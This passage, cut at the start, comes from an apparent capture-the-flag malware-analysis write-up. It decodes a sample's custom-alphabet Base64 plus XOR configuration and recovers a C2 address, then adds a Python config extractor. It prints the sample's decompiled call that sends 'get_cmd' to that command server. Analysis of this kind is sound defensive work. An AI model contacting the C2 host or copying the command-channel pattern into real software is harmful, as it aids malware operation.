          *v30 = v39;
        }
      }
    }
  }
  return v2;
}
```

This is an ordinary Base64 decoder except that the alphabet is looked up in a global std::string (dword_42ABC4), and that string is initialised with a swapped table: lowercase letters come first, then uppercase.

```c
int sub_401000()
{
  sub_4046D0("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/", 64);
  return sub_4066D3(sub_41BD10);
}
```

Script:

```python
import base64

custom_b64 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/"
std_b64    = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

def custom_b64_to_std(s: str) -> str:
    """Convert a string encoded with the custom alphabet into a standard Base64 string."""
    table = {c: std_b64[custom_b64.index(c)] for c in custom_b64}
    return "".join(table[c] for c in s)

def decode_custom_b64_xor1(s: str) -> bytes:
    std_str = custom_b64_to_std(s)
    raw = base64.b64decode(std_str)
    return bytes(b ^ 1 for b in raw)   # every decoded byte is XORed with 1

if __name__ == "__main__":
    s = "ntyVmZqZlZm5lZy5Fti2mZe1"
    out = decode_custom_b64_xor1(s)
    print(out)
    print(out.decode("ascii"))
```

```
b'47.252.28.78|37204'
47.252.28.78|37204
```

C2 address: 47.252.28.78:37204

3.4 Final communication

```c
send(s, "get_cmd", 7, 0);   // send the fixed string get_cmd
```

The sample connects to the C2 server and sends get_cmd. Visiting http://47.252.28.78:37204 returns the final flag (screenshot borrowed from 霍雅's writeup, not reproduced here).
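The decoder above only covers the last step; the marker search, the padding handling of sub_401D80's tail loop, and the ip|port split and stoi are what a config extractor has to reproduce to run over a downloaded blob unattended. The following is an added example, not part of the writeup, that implements the whole configuration-recovery path of sub_402450 in Python and runs it against the c2.dat body quoted above. The marker strings, alphabet and XOR key come from the decompiled code; the validation of the recovered IP and port is an addition, and a blob without both markers yields None rather than an exception, matching the sample's own "do nothing" behaviour.

```python
# Added example (not from the writeup): full C2-config extraction for the stage 3
# payload. C2_DAT is the body quoted in the analysis above.
import base64
import ipaddress

START_MARK, END_MARK = "E9dE7d", "lD1bZ0"         # delimiters pushed by sub_4046D0
CUSTOM_ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/"
STD_ALPHABET    = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
TO_STD = str.maketrans(CUSTOM_ALPHABET, STD_ALPHABET)

C2_DAT = ("oA0tG3aW2vT8mL5tvM1qV3cF2aB2xS6ztT7gX0zB1xR9zK8mjP0xP2iT3lO6fH1rpE4gP6pA2m"
          "E9dE7dntyVmZqZlZm5lZy5Fti2mZe1lD1bZ0"
          "nJ8gY7lR2qmP3vK5nY1hD3cT7guJ8tQ8rE6qJ1gF6ipZ0rF0vR5yB4xA4nyD7wM0lV5wC4rZ1c")

def decode_blob(segment: str, xor_key: int = 1) -> bytes:
    """Custom-alphabet Base64 -> standard Base64 -> bytes, then XOR every byte with xor_key."""
    bad = set(segment) - set(CUSTOM_ALPHABET) - {"="}
    if bad:
        raise ValueError(f"characters outside the alphabet: {sorted(bad)}")
    std = segment.translate(TO_STD)
    std += "=" * (-len(std) % 4)          # sub_401D80 tolerates a missing '=' padding
    return bytes(b ^ xor_key for b in base64.b64decode(std, validate=True))

def extract_c2(body: str):
    """Return (ip, port) from a downloaded config body, or None if the markers are absent."""
    start = body.find(START_MARK)
    if start < 0:
        return None
    start += len(START_MARK)
    end = body.find(END_MARK, start)
    if end < 0:
        return None
    plain = decode_blob(body[start:end]).decode("ascii")
    host, sep, port = plain.partition("|")   # format is ip|port
    if not sep:
        raise ValueError(f"unexpected config format: {plain!r}")
    ip = ipaddress.ip_address(host)          # raises on anything that is not an IP literal
    port_num = int(port)                     # the sample uses stoi; same failure modes
    if not 0 < port_num < 65536:
        raise ValueError(f"port out of range: {port_num}")
    return str(ip), port_num

if __name__ == "__main__":
    print(extract_c2(C2_DAT))                # ('47.252.28.78', 37204)
```

Because the markers and the alphabet are the only sample-specific inputs, the same three constants are what to re-extract from a new build of the payload before pointing this at a fresh c2.dat.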